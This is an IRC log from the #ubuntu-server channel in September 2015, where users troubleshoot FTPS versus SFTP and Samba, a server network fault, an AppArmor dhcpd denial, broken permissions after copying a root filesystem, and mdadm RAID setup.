<TJ-> But I dug into the issue with insserv; it *seems* there's a bug in the LSB headers for the /etc/init.d/mdadm script declaring it requires mdadm-raid, but no such service file exists
<patdk-lap> direct poweroff, WITHOUT safely unmounting or syncing the filesystems
<tarpman> patdk-lap: poweroff without shutting down first, you mean?  which systems do that?
<patdk-lap> solaris
<tarpman> ah k
 * tarpman mental note
<patdk-lap> gone oldschool on those, init 0
<sarnold> tarpman: beware of the 'reboot' command there too
<patdk-lap> na, reboot is sane
<sarnold> oh? was it sunos that just insta-rebooted then?
<patdk-lap> ya, same deal, but htat is safe
<sarnold> .. if you wanted sync and umount, you would typed those too :)
<patdk-lap> no, that is different
<patdk-lap> reboot would do a normal safe reboot
<patdk-lap> but it would not do a bios reboot by default, but just a kernel reload, if all the drivers supported it
<patdk-lap> otherwise you needed to do a reboot -p, to force a full bios reboot
#ubuntu-server 2015-09-24
<jvwjgames> Hi I need help my server has no internet
<jvwjgames> When ever I use ping or traceroute I always get a reply from my interfaces IP address.
<moneylotion> hey anyone have any ideas, how i can sync two nas servers, running zfs
<moneylotion> im thinking snapshots are a good idea, any others
<miriohmiri> moneylotion: take a look at rsync ;)
<moneylotion> will that spin up the drives?
<moneylotion> sort of wondering about frequency... want to avoid unneeded wear
<moneylotion> is there anything that is more async
<miriohmiri> i think in case you write something it will spin up, frequency: as often as you need it to be synced
<miriohmiri> on read i dont know if it will spin up with a zfs volume, but you might just give it a try
<moneylotion> anything that can replicate like a raid1 over network?
<miriohmiri>  i am trying to configure opendkim and on every parameter I write myself in the config, it says "unrecognized parameter" even if the parameter is clearly valid without typos acordingly to the manpage
<sudheer> hey guys.. I installed Ubuntu server using netboot.. installation completed successfully and when in restarts it goes to grub prompt and i dont see any vmlinuz to boot from there..  any thoughts on how to solve this..??
<RoyK> probably boot on some live thing and reinstall grub
<sudheer> ?? boot on live thing..??
<sudheer> its PXE install..!!
<RoyK> well, it seems grub is broken
<RoyK> I'm just suggesting
<sudheer> yea.. master boot record currupted is what i'm expecting..!!
<jamespage> coreycb, we'll never pbr>=1.8
<jamespage> *need
<jamespage> manila ftbfs
<jamespage> https://launchpadlibrarian.net/218717756/buildlog_ubuntu-wily-amd64.manila_1%3A1.0.0~rc1-0ubuntu1_BUILDING.txt.gz
<sudheer> but at least i should be able to see vmlunz and initrd under (HDx,y) drive
<jamespage> thats come from setup.py, no requirements.txt
<mnms_> guys I installed and configured vsftpd based on this doc https://help.ubuntu.com/community/vsftpd, but I cannot make it work with virtual users. I get 530 login incorrect
<mnms_> and Im out of ideas
<RoyK> mnms_: why ftp?
<RoyK> !ftp
<ubottu> FTP clients: Nautilus (Places -> Connect to server), gFTP, FileZilla (for !GNOME); Konqueror, Kasablanca, KFTPGrabber (for !KDE); FireFTP (for Firefox); ftp, lftp (for !cli) - See also !FTPd
<RoyK> mnms_: ftp is an old and insecure protocol - use sftp instead - it runs on top of ssh and is very secure - works with clients like filezilla too
<RoyK> mnms_: if your server has sshd running, sftp works
<RoyK> !ftpd
<ubottu> FTP servers: ftpd, proftpd, pure-ftpd, twoftpd, vsftpd, MuddleFTPd, wzdftpd - Graphical front-ends: PureAdmin, GProftpd (for GNOME), KcmPureftpd (for !KDE) - See also !FTP
<RoyK> ubottu: also, ftpd is old and insecure and should not be used. Use sftp instead!
<lordievader> Or use ftps.
<RoyK> lordievader: better use sftp - ftps is just ftp over ssl :P
<lordievader> Agreed, but still. ftps is better than ftp ;)
<RoyK> ftp is a horrible protocol
<lordievader> Yes.
<RoyK> lordievader: sure, but it's a pain to setup
<lordievader> Luckily never had to do that. I try to stay away from *ftp*
<RoyK> lordievader: and lots of rarities and issues with numerous clients
<RoyK> lordievader++
<RoyK> lordievader: I've tried, and found it's rubbish
<lordievader> Hehe
<RoyK> sftp just works(TM)
<RoyK> !sftp
<ubottu> SSH is the Secure SHell protocol, see: https://help.ubuntu.com/community/SSH for client usage. PuTTY is an SSH client for Windows; see: http://www.chiark.greenend.org.uk/~sgtatham/putty/ for it's homepage. See also !scp (Secure CoPy) and !sshd (Secure SHell Daemon)
<RoyK> secure, secret hell ;)
<mnms_> I have to use ftps cause some apps have to connect via ftp protocol
<RoyK> what sort of apps?
<mnms_> apps written in .net
<RoyK> written locally?
<mnms_> what do you mean locally ?
<RoyK> in-house stuff?
<mnms_> yes
<RoyK> then tell those developers to use something else - samba is better - sftp is better - EVERYTHING is better than FTP with or without the "s" at the end
<arcsky> Hi guys anyone here have Intel Ultimate-N 6300 wireless card? I cant get it to work in Linux Uubntu
<teward> !crosspost | arcsky
<ubottu> arcsky: Please don't ask the same question in multiple Ubuntu channels at the same time. Many helpers are in more than one channel and it's not fair to them or the other people seeking support.
<mnms_> RoyK: option FTPs is enough for me, it is enough secure. But I have real problem to make it work
<lordievader> arcsky: I have an Advanced-N 6205.
<mnms_> It is easier for me to setup ftps than changing other apps
<RoyK> mnms_: samba is pretty secure too and far easier to setup - last I tried to setup ftps, I ran into a truckload of issues with filezilla
<lordievader> arcsky: I guess that nic uses the same iwlwifi driver.
<mnms_> RoyK: I get right now GnuTLS error -15: An unexpected TLS packet was received.
<RoyK> mnms_: and those .net developers will just love to be able to just connect to a samba share instead of reinventing the wheel
<lordievader> Or use scp, that is likely already setup.
<RoyK> mnms_: might be the same I got - I just gave up
<mnms_> RoyK: It cannot be so hard to setup ftps ! :)
<RoyK> mnms_: well, noone uses FTP anymore
<mnms_> RoyK: sftp needs system account, I would like to have virtual account
<patdk-wk> using ftps is almost impossible
<RoyK> mnms_: so things aren't updated too often
<patdk-wk> cause it won't work if there is ANY NAT system at all
<RoyK> mnms_: samba doesn't need a system account
<mnms_> acha
<RoyK> patdk-wk: works fine with the linux nat helper ;)
<patdk-wk> royk, how?
<patdk-wk> if it does, it's seriously wrong
<RoyK> patdk-wk: but probably not ftps, though
<patdk-wk> it's encrypted
<RoyK> mhm
<RoyK> PORT 31235 encrypted :D
<arcsky> lordievader: yes i use iwlwifi
<RoyK> patdk-wk: I didn't think about the PORT thing
<patdk-wk> why the options are ftp or sftp, and never ftps :)
<RoyK> mnms_: just use something else, ok?
<mnms_> what NAT system has to encryption ?
<patdk-wk> nat has to *modify* the protocol data itself
<mnms_> RoyK: I cannot cause I need to be able to connect via ftp or ftps from those apps :(
<patdk-wk> if it's encrypted, that cannot happen
<RoyK> mnms_: no... FTP is a horrible protocol. When you try to transfer a file, the *client* opens a high port and tells the server to send data to that port
<RoyK> mnms_: if the data is encrypted, the router can't know which port to open/forward
<patdk-wk> ftp is a good protocol, it's just not nat friendly
<patdk-wk> nat was invented after ftp, and nat is evil
<RoyK> patdk-wk: well, nat is needed since people don't use ipv6 :P
<patdk-wk> sip is the same, and sip was made after nat :)
<mnms_> yep problem with IPs still exist
<RoyK> mhm - sip and nat isn't a stroll in the park
<RoyK> mnms_: not IP, IPv4
<patdk-wk> a huge goal of ipv6 was to remove nat
<mnms_> RoyK: thats what i mean
<patdk-wk> just not solve ip space limit
<patdk-wk> but yes, due to security designs these days, and stateful firewalls, ftp is becoming very useless
<RoyK> mnms_: so - find another solution - .net things usually run on windows, so a samba share should be the simple way
<mnms_> RoyK: I still dont understand why it is problem ftps for nat, tcp header is not encrypted ?
<mnms_> why nat is problm for ftps* sorry
<patdk-wk> what does tcp header have to do with anything
<mnms_> ROyK said GnuTLS error -15: An unexpected TLS packet was received.
<mnms_> if the data is encrypted, the router can't know which port to open/forward
<mnms_> sorry
<patdk-wk> yes
<patdk-wk> but what does that have to do with tcp headres?
<patdk-wk> headers
<mnms_> there is all info about src dest port and address yes ?
<RoyK> mnms_: no, but when you do GET /somefile, the client says "PORT xxx" to the server, in the encrypted, application stream, client opens port xxx and the server tries to connect to that port. The NAT router will open/forward that port, but not if the data stream is encrypted, since it can't know
<patdk-wk> your confusing the data connection tcp header, with the data INSIDE the control connection
<patdk-wk> and that is actually the least of your worries
<jvwjgames> I need help my server is not connecting to the internet j ping and traceroute anally I get is the interfaces IP as a reply
<patdk-wk> also contained in it is the IP address
<patdk-wk> that IP address needs to be replaced from your private ip to the public ip
<RoyK> "anally I get is.." (?!?)
<mnms_> RoyK: Passive range port doesnt solve this ?
<RoyK> mnms_: maybe - not sure - talk to the .net folks and ask if they can use a samba share
<RoyK> mnms_: it's easier for them to use and it's easier and more secure than ftps
<RoyK> mnms_: if they're on win2k12r2 or something, they can even use encrypted SMB3
<RoyK> mnms_: SMB3 doesn't work with win7, though, M$ doesn't want to backport nice things - it's better to force people to upgrade :P
<jvwjgames> Anyone
<mnms_> RoyK: The point is that I wanted to finish this with this shitty ftps solution :[
<RoyK> mnms_: just trying to help - it's easier in both short and long term to use something useful instead of hammering in large nails with a small screwdriver :P
<mnms_> RoyK: :)
<jvwjgames> I need help with my server
<jvwjgames> Any suggestions
<sesev> what's your problem
<jvwjgames> My internet on my server won't work
<jvwjgames> Ping results in interface IP being displayed
<jvwjgames> Regardless of destination
<lordievader> jvwjgames: Does your interface has an ip?
<jvwjgames> Yes it is static
<lordievader> jvwjgames: Hmm, okay. Does it have a gateway?
<jvwjgames> Yed
<jvwjgames> Yes it does
<lordievader> jvwjgames: Can you ping the gateway?
<jvwjgames> I do now the modem works cause I have other stuff connected
<jvwjgames> Destination host unreachable
<lordievader> jvwjgames: There is your problem.
<jvwjgames> What
<jvwjgames> What is the problem
<lordievader> jvwjgames: You cannot reach your gateway and thus the internet.
<lordievader> Likely your static ip is wrongly configured.
<jvwjgames> It isn't cause I have it configured as before all I did was reboot
<arcsky> lordievader: any idea how i can solve it? it keeps asking me for the password all the time to my accesspoint
<lordievader> arcsky: Sorry got to go. But look at wpa_supplicant. Will likely tell you more.
<mnms_> credintials are encrypted by default when connect to samba resource ?
<patdk-wk> if the server enables it
<mnms_> aha
<hallyn> smb: holy cow!   qemu commit 75d373ef9729b    pisses me off!
<hallyn> i'd been looking for something lik ethat in the kernel, failed to check qemu
<smb> hallyn, heh yeah, nice aren't they
<hallyn> i especially love the "probably"
<smb> hallyn, I am also a bti sad that somehow in my case the emulated cpu fails to do the cpuid part
<hallyn> ?
<smb> hallyn, my comment before. I got no system to reall test the g4 case. For g3 (and I think I am only lucky because I use some other machine type as template) it keeps the svm bit but fails to implement a cpuid function which normally would report svm version level and such
<hallyn> oh
<smb> hallyn, lots of fun...
<RoyK> mnms_: yes, encryption is on by default. data encryption is supported on newer samba, but requires win8 or win2k12 (or recent linux/mac) on the client to work
<RoyK> win7 doesn't support data encryption
<RoyK> (as in SMB3)
<mnms_> RoyK: so connecting from win7 to samba resource means that credintials are in almost plain text ?
<RoyK> no, connecting from win7, *data* is in cleartext
<RoyK> but that's win -> windows server too
<patdk-wk> so auth is protected
<patdk-wk> but that xls file of passwords you just viewed, wasn't
<RoyK> hihi
<mnms_> RoyK: Credintials are always encrypted ?
<patdk-wk> not always
<patdk-wk> there are 3 options, not protected, protected if supported, always protected
<mnms_> patdk-wk: those are option for samba resource definition ?
<RoyK> mnms_: if "encrypt passwords = yes", which is the default
<patdk-wk> no, those are options for windows smb
<patdk-wk> no idea how to do it in samba, I don't use samba
<mnms_> RoyK: Thanks
<RoyK> mnms_: you have to go back some 10 years or so to find SMB without encrypted passords
<RoyK> IIRC that came into win98 or so
<mnms_> RoyK: Ok so I dont have to worry about connection encryption, the only thing now is data transferred from machine after connection
<mnms_> which as you said can be not encrypted in some cases
<RoyK> mnms_: smb3 supports and uses encryption
<RoyK> mnms_: but then, you need a client that supports smb3, such as modern linux, windows and os x, but that does not include windows 7
<mnms_> xp or vista doesnt support ?
<patdk-wk> xp isn't supported at all, xp died last year
<alreece45> unless you happen to be one of the lucky few who gets special support from Microsoft
<mnms_> RoyK, patdk-wk: thanks for support Im going to start my day away from desk :)
<RoyK> mnms_: :)
<MrPockets> I'm trying to start a fresh install of vsftpd but it doesn't seem to start.   service vsftpd status shows  stop/waiting
<RoyK> MrPockets: we just had a long discussion about ftp in here, just before you came in - just don't use it
<MrPockets> Thats,  ....not really an option
<arcsky> guys i get very often "System program problem detected
<arcsky> how can i see more detail about the issue?
<arcsky> Do you want to report the problem now?"
<gQuigs> hi, any plans for landing python-novaclient 2.23 in Kilo cloud archive?  there are two high importance api bug fixes -https://launchpad.net/python-novaclient/+milestone/2.23.0
<gQuigs> to that end, is liberty cloud archive available yet?  - doesn't seem to work - https://wiki.ubuntu.com/ServerTeam/CloudArchive#Liberty
<sarnold> gQuigs: it all looks like it ought to work, e.g. http://ubuntu-cloud.archive.canonical.com/ubuntu/dists/trusty-updates/liberty/  and http://reqorts.qa.ubuntu.com/reports/ubuntu-server/cloud-archive/liberty_versions.html  have a lot of packages..
<gQuigs> sarnold:  I was able to manually add it.. hmm
<gQuigs> ubuntu@quicktest2:~$ sudo add-apt-repository cloud-archive:liberty
<gQuigs> 'liberty': not a valid cloud-archive name.
<gQuigs> Must be one of ['folsom', 'folsom-proposed', 'grizzly', 'grizzly-proposed', 'havana', 'havana-proposed', 'icehouse', 'icehouse-proposed', 'juno', 'juno-proposed', 'kilo', 'kilo-proposed', 'tools', 'tools-proposed']
<sarnold> gQuigs: eww.
<gQuigs> I see - http://changelogs.ubuntu.com/changelogs/pool/main/s/software-properties/software-properties_0.92.37.3/changelog
<gQuigs> each archive needs to be manually added to the package
<gQuigs> ah I see - https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1472586
<ubottu> Launchpad bug 1472586 in software-properties (Ubuntu Trusty) "[SRU] Add support for liberty cloud-archive" [Undecided,Fix committed]
<keithzg> Huh, why in the world am I suddenly getting apparmor complaining about dhcpd?
<keithzg> apparmor="DENIED" operation="open" profile="/usr/sbin/dhcpd" name="/run/dhcp-server/dhcpd.pid" pid=9413 comm="dhcpd" requested_mask="r" denied_mask="r" fsuid=122 ouid=122
<keithzg> The server was working fine before, weird.
<jjohansen> keithzg: what release?
<keithzg> jjohansen: 14.04
<keithzg> Honestly I think things in general were going super-wonky, I walked over to the actual server and although it had been up and running for months in a normal boot, it was now asking me for the root password or to run ctrl-d to continue...
<keithzg> I blame cosmic rays (or as-yet-undiscovered hardware failure of some kind, or just the honestly rather atrocious electrical in this building)
<keithzg> It definitely wasn't any sort of update, I've actually been a slacker on keeping this particular server up to date.
<keithzg> (although it wasn't *too* long ago; it is on 14.04.3 to be exact)
<jjohansen> keithzg: can you pastebin the output of
<jjohansen>   apparmor_parser -p /etc/apparmor.d/usr.sbin.dhcpd
<keithzg> jjohansen: What pastebin server should I specify? Whatever the default one for pastebinit in 14.04 is, it's giving me "Failed to contact the server: [Errno socket error] [Errno -2] Name or service not known" now.
<jjohansen> keithzg: meh, any pastebin will do paste.ubuntu.com  pastebin.com
<keithzg> jjohansen: naw, neither of those (either with our without a leading http://) work. Which is weird 'cause they're all listed with "pastebinit -l".
<jjohansen> keithzg: what do you get if you do
<jjohansen>   host paste.canonical.com
<keithzg> As an option using pastebinit -b, I get "Unknown website, please post a bugreport to request this pastebin to be added (paste.canonical.com)". Running the actual host command, I get "paste.canonical.com has address 91.189.90.172"
<jjohansen> keithzg: my guess is you are having nameresolution failure issues, and may need to restart dns related things
<jjohansen> oh shoot if host is returning an ip its not name resolution, so I need a new theory
<jjohansen> firewall?
<keithzg> I'd be a bit surprised by that, unless it's somehow on the server itself and I've never noticed; if I run it on my desktop here (also 14.04) it works just fine.
<lordievader> Is lvmetad not available on Ubuntu? Or am I blatently overlooking things?
<maswan> jjohansen: it can still be resolving. host asks dns directly, you can break libc resolving in other ways. "getent hosts <hostname>" is a better test.
<keithzg> jjohansen: nevermind, I think I know what it is. The server *was* just rebooted, and I remember now that despite my searching I still haven't figured out what puts "nameserver localhost" in /etc/resolv.conf on this server, oops.
<keithzg> http://paste.ubuntu.com/12546292/ is the apparmor output now.
<keithzg> maswan: Oh, getent does that too? Nice, didn't know that.
<jjohansen> keithzg: so the profile definitely allows access to /run/dhcp-server/dhcpd.pid
<jjohansen> I thought perhaps it might have missed that variant, but its there
<jjohansen> so I am not sure why it would get that denial
<keithzg> jjohansen: Oh? I was just perusing the file and didn't see that, is it just implied by an include?
<jjohansen> hrmm doesn't look to be in an include
<jjohansen> /{,var/}run/{,dhcp-server/}dhcpd{,6}.pid rw,
<keithzg> ahhh I see, fair enough
<maswan> keithzg: yeah, very useful for debugging resolving when you accidentally /etc/hosts or nsswitch.conf, etc.
<keithzg> maswan: cool, yeah, I'll definitely have to keep that in mind (especially since many of these servers I've inherited here has various ugly hacks and workarounds layered in their history)
<keithzg> jjohansen: Any ideas where to poke next then?
<jjohansen> keithzg: restart dhcpd and see if the denied message shows up again
<jjohansen> keithzg: you can try replacing the profile first, to make sure its got the right policy in the kernel
<jjohansen>   apparmor_parser -r /etc/apparmor.d/usr.sbin.dhcpd
<keithzg> jjohansen: Yeah, restarting isc-dhcp-server prints another such error in kern.log
<jjohansen> that would take care of a bit flip error in the policy, or such problems
<jjohansen> okay, replace the profile and restart the service again
<keithzg> ALLOWED now!
<keithzg> So maybe I *can* blame cosmic rays?
<jjohansen> ugh, yeah or something writing over policy in memory
<jordanrandles> I installed openvpn to my server and I guess I set it up wrong because when i restarted my server I cannot connect to it anymore. Its turned on and booted up fine but no connections in and no packets coming out of it. Does anyone know a way of fixing my issue?
#ubuntu-server 2015-09-25
<sarnold> jordanrandles: are there any errors or warnings logged in any log files that look relevant?
<jordanrandles> sarnold: I wouldnt know, I dont have access to the log files. The server computer is in my server room but it wont let me input anything using a keyboard as if the USBs are not working but they are fine. Its ever since I 'tried' setting up openvpn
<jordanrandles> Its not taking any input from the keyboard
<jordanrandles> it seems like the server only does this using Linux 3.16
<jordanrandles> But I just booted using Linux 3.13 and it works fine. Is there any way to make the server always boot into this version?
<sarnold> you could edit your grub menu to only include the 3.13 kernel, or uninstall the 3.16 kernels..
<sarnold> but more likely that's just a symptom of something else that didn't work, perhaps the initrd images weren't properly created for the 3.16 kernels..
<jordanrandles> So what do I do to fix this?
<jordanrandles> Or find out if that is the problem?
<jvwjgames> No internet from my server need help
<jvwjgames> I had to go earlier and was not able to fix the issue
<sarnold> jvwjgames: start with the basics: make sure ethernet wires are fully seated, not wrapped around flourescant ballasts, etc.; make sure everything in the path is properly plugged in; check dmesg and log files for errors
<sarnold> jvwjgames: make sure you've got good link light from both NICs; replace endpoints if you need to
<sarnold> jvwjgames: check ip addr show and ip route show output on both hosts, make sure they make sense
<jvwjgames> Whenever I ping or traceroute I get interface IP as reply regardless of what the destination is
<sarnold> jvwjgames: start with simple protocols, ping to IPs, then nc to tcp and udp ports; if those work but larger packets don't work, maybe pmtu settings are broken?
<jvwjgames> See my post above ^^
<TJ-> jvwjgames: is the IP address assigned by DHCP, or manually set?
<jvwjgames> Manually
<jvwjgames> And I do know it's right cause I tested it before
<sarnold> jvwjgames: does "ip addr show" and "ip route show" look correct on both hosts?
<TJ-> jvwjgames: can you pastebin (transfer via USB maybe) the "/etc/network/interfaces" file if that is where you've defined the interface
<jvwjgames> Ok
<DammitJim> I'm having issues with a domain user authenticating when I try to log on
<DammitJim> the workstation has been joined to the domain
<hellslinger> hi guys, does anyone know where UFW gets started in the boot process? where can I find out?
<neurotus> i'm having problems enabling htaccess on my apache2 ubuntu 14.04
<neurotus> i have default install and have done .htaccess and .htpasswd with a webgenerator site, it says "Forbidden" currently the dir with .htaccesss
<neurotus> i have AllowOverride All
<neurotus> dont have htpasswd program that many guides refer to
<neurotus> now have htpasswd from apache2-utils
<neurotus> did htpasswd -c /var/www/html/poly/.htpasswd poly
<neurotus> so everything should be okay
<lordievader> Good morning
<neurotus> morning lordievader
<neurotus> -> cig
<lordievader> Hey neurotus
<neurotus> lordievader: any help with apache2 .htaccess would be appreciated
<lordievader> What are you trying to accomplish?
<neurotus> lordievader: basic user-auth
<lordievader> Ok, where is the directory defined?
<lordievader> That is where I have configured the basic auth.
<neurotus> /var/www/html/poly
<lordievader> neurotus: That is the directory, not apache's definition of it.
<lordievader> Those are usually somewhere in /etc/apache2/
<neurotus> darn, now the whole /var/www/html is protected and doesnt ask for password and not only the html/poly folder
<lordievader> How did you configure the basic auth?
<neurotus> i get 403 FORBIDDEN and it doest not ask for a password
<lordievader> How did you configure the basic auth?
<neurotus> lordievader: i just put .htaccess in /var/www/html/directory and put in apache2.conf AllowOverride All
<lordievader> So you didn't configure anything?
<neurotus> and did .htpasswd in directory
<Ben64> if you remove .htaccess does the folder work
<neurotus> Ben64: nope
<Ben64> then fix that first
<jamespage> morning all
<neurotus> -> away
<neurotus> i get "Forbidden" when i try to access my apache2, have purged apache2-data and apache2 and done a clean install
<neurotus> i'm gonna purge them again and move /var/www as it isn't empty and check /etc
<neurotus> ok, now working, had to do something with my contents of /var/www/html
<neurotus> as they were not removed on purge of apache2
<neurotus> what was that package that checked after apt-get update that no processess are using old files ?
<jamespage> coreycb, I re-merged python-pbr from experimental but I had todo it the hard way
<jamespage> downloaded the source package directly from ftp.debian.org and did it by hand
<jamespage> coreycb, I think we can do 'syncs' the same way
<jamespage> coreycb, syncs might be functional again in a bit - launchpad team are working on it
<jordan_> does anyone here use openvpn-as?
<coreycb> jamespage, ok good thanks
<jordan_> does anyone know if there is a way to get openvpn-as on a intel server??
<jordan_> |
<jamespage> coreycb, ok syncs are possible again now - ceilometerclient done :-)
<coreycb> jamespage, \o/
<jamespage> coreycb, I think you can sync all of the clients yourself right?
<jamespage> they are mostly/all seeded
<jamespage> coreycb, ping me if you hit something not right
<coreycb> jamespage, ok going to take a pass through them now
<jamespage> coreycb, awesome
<jamespage> that should make the core packages for rc1 build and uploadable
<jordan_> does anyone know if there is a way to get openvpn-as on an intel server??
<jpds> openvpn-as?
<jordan_> Openvpn-access server. All I can find are packages for AMD servers but I have intel servers
<RoyK> jordan_: why don't you just use the oss openvpn?
<RoyK> jordan_: amd64 is the architecture intel uses these days
<jordan_> ;-; I dont know how to setup the normal openvpn package
<RoyK> jordan_: there are lots of docs out there, and it's not hard, also openvpn is free
<RoyK> openvpn-as is not
<jordan_> I see, Ill try and set it up because of you
<RoyK> :)
<jordan_> fails with 'dh1024.pem': No such file or directory ?????
<Pici> jordan_: what does?
<jpds> jordan_: Did you create that file?
<jpds> jordan_: It's part of the openvpn RSA set up process
<samba35> i have 8 gb ram with 3 guest and 2 guest with memory ballooning but it seems it is not using bollooning
<samba35> it is using swap file
<samba35> on kvm 14.04.3
<jamespage> coreycb, problem with pysaml2?
<coreycb> jamespage, yeah, haven't gotten back to it today but for some reason tests seemed to be running code in the .pc/ dir
<RoyK> samba35: how much memory have you given those guests?
<patdk-wk> 64kb
<samba35> 2 gb and 2gb allocated with 1 gb ballon
<jamespage> coreycb, is that required for keystoneclient?
<coreycb> jamespage, yes
<samba35> 64kb is suppose to be use ?
<samba35> patdk-wk: ?
<jamespage> coreycb, are we sure?
<coreycb> jamespage, checking
<jamespage> coreycb, i can't see it in either requirements or test-requirements
<jamespage> coreycb, zigo had this wrong before
<jamespage> in the packaging that is
<coreycb> jamespage, ok yeah let me drop it and try building
<jamespage> coreycb, zigo also added memcached - I lack context for why that's been added
<patdk-wk> well, if your using cp/m or an apple][, sure
<RoyK> samba35: he's probably just trolling as usual ;)
<patdk-wk> :)
<coreycb> jamespage, they both get hits when grepping the code
<jamespage> coreycb, really?
 * jamespage looks again
<coreycb> jamespage, I think memcache is optional for tests
<jamespage> coreycb, I really cant see any evidence of requirement for those two deps in keystoneclient
<jamespage> keystone - yes - client -no
<coreycb> jamespage, I don't think saml2 is needed, the only import of saml2 happens to be a keystoneclient file named saml2
<jamespage> yes
<coreycb> jamespage, I'm dropping them and rebuilding
<jamespage> ok
<jamespage> smb, is the dpdk in the NEW queue exactly the same as in your PPA?
<smb> jamespage, It should be, though I forgot whether arges has not made some minimal changes like removing comments about fixme
<jamespage> smb, I really need that into the archive
<jamespage> I have todo the ovs bits as well
<jamespage> and I'm running out of time window
<smb> jamespage, we need some aa or are you one?
<gQuigs> is there a chance to do a a 2.22 -> 2.23 bump for python-novaclient https://bugs.launchpad.net/cloud-archive/+bug/1499510?
<ubottu> Launchpad bug 1499510 in python-novaclient (Ubuntu) "In Kilo Upgrade python-novaclient to 2.23" [Undecided,New]
<gQuigs> or should I just do a request for the specific fix I need?
<gQuigs> btw, do I want to get it into vivid first, and then it get's synced to CloudArchive?
<smb> jamespage, ok so its not identical to the ppa but to what is in the lp git tree (ubuntu-wily branch)
<smb> jamespage, beside the fixme there is one relevant change to call dh_install in binary indep which causes the examples to be packaged
<mnaser> Would anyone know why a md raid-10 array have this type of io pattern? http://paste2.org/YDLGaLJW
<RoyK> mnaser: what's in /proc/mdstat?
<mnaser> RoyK: http://paste2.org/La4aHdHm
<RoyK> mnaser: no idea - perhaps there's only a little space used and all that is on the first four drives?
<RoyK> (first two mirrors=
<RoyK> (first two mirrors)
<mnaser> RoyK: it's a fresh new server so yes, but shouldn't reads come from all stripes?
<RoyK> mnaser: perhaps better to ask on #linux-raid
<RoyK> mnaser: I've never used r10 with md
<mnaser> RoyK: thanks, i'll have a poke there
<jamespage> coreycb, as I tagged keystone, I uploaded just now
<coreycb> jamespage, thanks
<jamespage> coreycb, heat versioning can be fixed up and re-uploaded as we got the broken one dropped from proposed
<coreycb> jamespage, ok
<coreycb> jamespage, keystoneclient py3 tests are not happy, 40 failures
<coreycb> jamespage, most of the other clients are in good shape now though
<jamespage> coreycb, ack
<jamespage> coreycb, that should unblock alot of core package uploads - test everything via PPA first and then shove them in the queue for release team to review
<coreycb> jamespage, ok. I'm testing in here btw: https://launchpad.net/~corey.bryant/+archive/ubuntu/wily
<jamespage> coreycb, awesome
<nch> hello, I moved the content of / of my mdadm raid lvm volume to a new hard drive partition and installed grub manually on the new hard drive, the system is running but I cant start several services and when I try to use tab for autocompletion in directory navigation it tells me: -bash: cannot create temp file for here-document: Permission denied
<nch> what is wrong here? The syslog file is also clear :\
<sarnold> nch: feels like you might have incorrect permissions on a directory somewhere
<sarnold> nch: /tmp feels quite likely; try ls -ld /tmp
<nch> sarnold: it gives me that: "drwxr-xr-t 5 1777 root 4096 Sep 25 20:40 tmp"
<sarnold> aha, that's probably it ;)
<sarnold> nch: chown 0:0 /tmp ;  chmod 1777 /tmp  ; check it again
<nch> now it gives me that: drwxrwxrwt 5 root root 4096 Sep 25 20:45 tmp
<nch> but it is still not working
<nch> sarnold: any other idea why syslog gets no entries and my apps are not starting due to permission errors I guess?
<sarnold> nch: hmm, you may have more permissions problems; I was hoping that'd be the only one
<sarnold> I don't know off-hand any way to automate looking for them on ubuntu system
<nch> sanold: but why? I just copied the whole content of / with cp :\
<sarnold> nch: cp doesn't copy permissions and owner and group information unless you request it specifically with e.g. cp -a or fiddle with --preserve ...
<nch> well shit -.-
<sarnold> nch: if you copied a whole system withuot cp -a you may find it easier to start over
<nch> Ok now I dont have the original / is there any way to change the permissions for the whole system?
<sarnold> nch: another possibility is to fix errors one at a time until you get a point tha tyou can run apt-get install --reinstall ... on every package on the system
<nch> sarnold: well shit
<sarnold> nch: that sounds like a pretty fair summary of the situation :)
<nch> sarnold: well yes, I have no plan what to do now :\
<sarnold> nch: I'm actually surprised it booted far enough for you to get to a shell that lets you solve problems. it could be worse.
<sarnold> nch: but there's no denyuing that fixing this will be painful.
<nch> sarnold: yes the boot was no problem, also samba and its network shares are working fine but the rest not^^
<sarnold> nch: check ls -ld output for a huge number of directories; /etc /etc/init* /etc/rc* /bin /usr/bin/ /sbin/ /usr/sbin/ etc etc..
<nch> nch@media:/$ ls -ld /etc drwxr-xr-x 112 root root 4096 Sep 25 20:03 /etc
<nch> nch@media:/$ ls -ld /bin drwxr-xr-x 2 root root 4096 Sep 25 04:45 /bin
<nch> sarnold: well that looks good so far
<Slugs_> Iâm trying to setup a raid using mdadm ( i donât have dmraid installed) and i have created 4 partitions using fdisk.  When i try to create the array i get â¦..
<Slugs_> openstack@openstack:~$ sudo mdadm --create --verbose /dev/md0 --level=stripe --raid-devices=4 /dev/sd[abcd]1
<Slugs_> mdadm: super1.x cannot open /dev/sda1: Device or resource busy
<Slugs_> mdadm: ddf: Cannot use /dev/sda1: Device or resource busy
<Slugs_> mdadm: Cannot use /dev/sda1: It is busy
<Slugs_> mdadm: cannot open /dev/sda1: Device or resource busy
<RoyK> Slugs_: first of all, why partitions?
<Slugs_> Hi RoyK
<Slugs_> well, thatâs one of the guides i followed online
<Slugs_> don
<Slugs_> i can delete the partitions
<RoyK> Slugs_: and --level=stripe - is that like russian roulette
<Slugs_> lol
<Slugs_> yeah i know you and i discussed this, i didnât care about data loss
<jrwren> partitions are good.
<RoyK> jrwren: nah
<RoyK> jrwren: using raw disks is better
<jrwren> why?
<RoyK> jrwren: helps things when you want to extend
<jrwren> how?
<RoyK> jrwren: why do you want those partitions anyway?
<jrwren> need everything to start offset a few MB so I can keep bootsectors at start of disk.
<RoyK> jrwren: hey! I have a partition! it's 2TB!
<jrwren> right, 2TB minus 2MB so that I can boot from any disk in the set
<RoyK> jrwren: don't use the OS disks for data
<jrwren> why?
<RoyK> jrwren: use data disks for data, use separate OS disks
<jrwren> why?
<RoyK> jrwren: because it makes things easier
<RoyK> jrwren: recovery etc
<jrwren> how?
<Slugs_> lol
<RoyK> jrwren: but then, I've only worked with this for 20+ years :P
<jrwren> could it be the same year 20 times? :p
<RoyK> jrwren: take a good advice, please
<jrwren> why?
<RoyK> jrwren: just google it
<jrwren> ok.
 * RoyK is not in a mood of teaching idiots how to ignore advices
<Slugs_> ok so i have 4 disks, all 4TB a peice
<Slugs_> used only for data
<RoyK> Slugs_: why raid0
<Slugs_> i was doing it for speed.
<Slugs_> but i think yiou migfht have said not really good performance with 4 TB disks anyway
<RoyK> Slugs_: you'll get the same speed of a raid5 with 3 drives as a raid0 of 4 drives, sequencially
<Slugs_> what do i do with the other disk?
<RoyK> Slugs_: and it saves a day or three if you use raid5
